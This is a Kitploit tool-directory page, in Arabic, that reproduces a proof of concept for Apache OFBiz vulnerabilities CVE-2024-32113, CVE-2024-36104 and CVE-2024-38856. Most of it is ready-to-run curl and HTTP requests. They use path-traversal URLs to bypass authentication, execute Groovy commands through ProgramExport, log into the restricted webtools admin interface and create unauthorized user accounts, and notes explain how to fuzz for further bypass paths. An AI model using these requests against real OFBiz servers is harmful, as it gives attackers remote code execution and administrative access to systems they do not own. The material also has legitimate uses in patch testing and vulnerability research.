Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-32113-POC — ثغرات Apache OfBiz | Kitploit
أدوات/GitHubGitHub/racerz-fighting/cve-2024-32113-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقة
GitHubracerz-fighting/cve-2024-32113-poc

CVE-2024-32113-POC

ثغرات Apache OfBiz

عرض المستودع
824منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرات Apache OfBiz

POC لـ CVE-2024-32113

يمكن توفير معامِلَي USERNAME وPASSWORD في واجهة /ecomseo/AnonContactus، وهي واجهة متاحة للجميع.

  • POC1: RCE

    root@kitploit:~
    curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/ProgramExport' \
    --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
    --header 'Accept: */*' \
    --header 'Host: 127.0.0.1:8443' \
    --header 'Connection: keep-alive' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode '[email protected]' \
    --data-urlencode 'JavaScriptEnabled=Y' \
    --data-urlencode 'PASSWORD=12345' \
    --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
    
  • POC2: يمكنك تجاوز تسجيل الدخول للوصول إلى واجهة إدارة webtools المقيدة.

    root@kitploit:~
    curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/login/' \
    --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
    --header 'Accept: */*' \
    --header 'Host: 127.0.0.1:8443' \
    --header 'Connection: keep-alive' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode '[email protected]' \
    --data-urlencode 'PASSWORD=12345' \
    --data-urlencode 'JavaScriptEnabled=Y'
    
  • POC3: يمكنك تسجيل حساب مستخدم عادي، حيث يُستخدم userLoginId كاسم مستخدم.

    root@kitploit:~
    curl --noproxy '*'  -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/createUserLogin' \
    --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
    --header 'Accept: */*' \
    --header 'Host: 127.0.0.1:8443' \
    --header 'Connection: keep-alive' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode '[email protected]' \
    --data-urlencode 'PASSWORD=12345' \
    --data-urlencode 'JavaScriptEnabled=Y' \
    --data-urlencode 'enabled=Y' \
    --data-urlencode 'partyId=' \
    --data-urlencode 'userLoginId=30000' \
    --data-urlencode 'currentPassword=12345' \
    --data-urlencode 'currentPasswordVerify=12345' \
    --data-urlencode 'passwordHint=' \
    --data-urlencode 'requirePasswordChange=N' \
    --data-urlencode 'securityQuestion=' \
    --data-urlencode 'SecurityAnswer=' \
    --data-urlencode 'externalAuthId='
    
  • POC لـ CVE-2024-36104

    • RCE1

      root@kitploit:~
      curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/.%2e/.%2e/.%2e/webtools/control/ProgramExport' \
      --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
      --header 'Accept: */*' \
      --header 'Host: 127.0.0.1:8443' \
      --header 'Connection: keep-alive' \
      --header 'Content-Type: application/x-www-form-urlencoded' \
      --data-urlencode '[email protected]' \
      --data-urlencode 'JavaScriptEnabled=Y' \
      --data-urlencode 'PASSWORD=12345' \
      --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
      
    • RCE2

      root@kitploit:~
      curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/..;/..;/..;/webtools/control/ProgramExport' \
      --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
      --header 'Accept: */*' \
      --header 'Host: 127.0.0.1:8443' \
      --header 'Connection: keep-alive' \
      --header 'Content-Type: application/x-www-form-urlencoded' \
      --data-urlencode '[email protected]' \
      --data-urlencode 'JavaScriptEnabled=Y' \
      --data-urlencode 'PASSWORD=12345' \
      --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
      

      ملاحظة: ; سيتسبب في رمي استثناء عند تعيين الكوكيز، لذا تحتاج إلى الحصول على الكوكيز يدويًا.

      image-20240514104449523

    image-20240514104433195

    POC لـ CVE-2024-38856

    • RCE

      root@kitploit:~
      POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: 127.0.0.1:8443
      
      groovyProgram=throw+new+Exception('id'.execute().text);
      

      ملاحظة: يمكن استبدال forgotPassword بطلبات أخرى. يمكنك محاولة البحث عنه في webapp/webtools/WEB-INF/controller.xml (كما هو موضح في الصورة) لتنفيذ اختبارات التلغيم (fuzzing). طالما أن الطلب يُرجع success بنجاح، يمكنه تشغيل RCE في وحدة ProgramExport.

      image-20240604195154504

    تنزيل الأداة